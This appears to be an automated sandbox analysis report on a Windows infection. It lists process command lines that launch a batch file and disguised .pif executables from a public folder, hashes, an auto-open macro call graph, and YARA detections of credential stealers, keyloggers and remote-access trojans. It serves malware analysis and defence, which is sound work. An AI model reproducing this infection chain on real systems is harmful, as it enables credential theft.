                                                                                                                                          Start time:01:54:06
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:01:54:06
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:01:54:06
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:175'800 bytes
                                                                                                                                          MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3761815034.00000000221C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.3761815034.00000000221C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000002.3731530309.0000000000C20000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000001.2128731771.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000001.2128731771.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 3%, ReversingLabs
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:01:54:17
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Users\Public\Libraries\Aiymwhpj.PIF
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\Public\Libraries\Aiymwhpj.PIF"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'161'216 bytes
                                                                                                                                          MD5 hash:6047499517804F1EA76B508CA469DE99
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 26%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:13
                                                                                                                                          Start time:01:54:18
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:14
                                                                                                                                          Start time:01:54:18
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:15
                                                                                                                                          Start time:01:54:18
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:175'800 bytes
                                                                                                                                          MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000001.2248691179.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000002.3731678723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000002.3731678723.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000001.2248691179.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3760427867.000000001D271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.3760427867.000000001D271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:16
                                                                                                                                          Start time:01:54:26
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Users\Public\Libraries\Aiymwhpj.PIF
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\Public\Libraries\Aiymwhpj.PIF"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'161'216 bytes
                                                                                                                                          MD5 hash:6047499517804F1EA76B508CA469DE99
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:17
                                                                                                                                          Start time:01:54:26
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:18
                                                                                                                                          Start time:01:54:26
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:19
                                                                                                                                          Start time:01:54:26
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:175'800 bytes
                                                                                                                                          MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000013.00000001.2327344722.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000013.00000002.3731782871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000013.00000001.2327344722.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.3761096680.0000000023881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.3761096680.0000000023881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000013.00000002.3731782871.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Has exited:false

                                                                                                                                          Call Graph

                                                                                                                                          callgraph 9 AutoOpen Shell:1,CreateObject:2,Open:1,Send:1

                                                                                                                                          Module: ThisDocument

                                                                                                                                          Declaration
                                                                                                                                          Attribute VB_Name = "ThisDocument"
                                                                                                                                          Attribute VB_Base = "1Normal.ThisDocument"
                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                          Attribute VB_TemplateDerived = True
                                                                                                                                          Attribute VB_Customizable = True

                                                                                                                                          APIs

                                                                                                                                          Meta Information

                                                                                                                                          CreateObject

